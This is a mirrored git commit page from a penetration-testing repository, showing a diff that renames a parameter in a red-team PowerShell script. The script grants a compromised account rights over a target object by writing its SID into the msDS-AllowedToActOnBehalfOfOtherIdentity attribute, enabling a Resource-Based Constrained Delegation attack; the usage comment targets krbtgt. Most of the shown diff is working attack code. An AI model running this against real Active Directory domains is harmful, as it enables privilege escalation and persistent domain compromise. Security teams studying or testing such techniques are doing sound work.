Git/mgeeky-Penetration-Testing-Tools
1
0
Fork 0
mirror of https://github.com/mgeeky/Penetration-Testing-Tools.git synced 2024-11-22 10:31:38 +01:00
Code Issues Packages Projects Releases Wiki Activity

fixed paramter name

Browse Source
This commit is contained in:
mgeeky 2019-08-22 15:46:08 +02:00
parent 0062483b8b
commit a99ab7a0bf
1 changed files with 6 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
red-teaming/Set-PrincipalAllowedToDelegateToAccount.ps1
View File

@ -3,10 +3,10 @@
# #
# Usage: # Usage:
# PS> . .\Set-PrincipalAllowedToDelegateToAccount.ps1 # PS> . .\Set-PrincipalAllowedToDelegateToAccount.ps1
# PS> Set-PrincipalAllowedToDelegateToAccount -TargetUser krbtgt -TargetComputer COMPROMISED$ # PS> Set-PrincipalAllowedToDelegateToAccount -TargetUser krbtgt -DelegateFrom COMPROMISED$
# #
# Will allow for COMPROMISED$ machine account to perform S4U2 constrained delegation by the use # Will allow for COMPROMISED$ account to perform S4U2 constrained delegation by the use
# of Resource-Based Constrained Delegation flavour attack. # of Resource-Based Constrained Delegation flavour attack. This account must have any SPN set first.
# #
# Script for setting "msDS-AllowedToActOnBehalfOfOtherIdentity" property on the user's object, # Script for setting "msDS-AllowedToActOnBehalfOfOtherIdentity" property on the user's object,
# allowing incoming trust to the previously compromised Machine object, as described # allowing incoming trust to the previously compromised Machine object, as described
@ -31,11 +31,11 @@ function Set-PrincipalAllowedToDelegateToAccount
[Parameter(Position = 1)] [Parameter(Position = 1)]
[ValidateNotNullOrEmpty()] [ValidateNotNullOrEmpty()]
[String] [String]
$TargetComputer $DelegateFrom
) )
# translate the identity to a security identifier # translate the identity to a security identifier
$IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $TargetComputer).Translate([System.Security.Principal.SecurityIdentifier])).Value $IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $DelegateFrom).Translate([System.Security.Principal.SecurityIdentifier])).Value
# Substitute the security identifier into the raw SDDL # Substitute the security identifier into the raw SDDL
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($IdentitySID))" $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($IdentitySID))"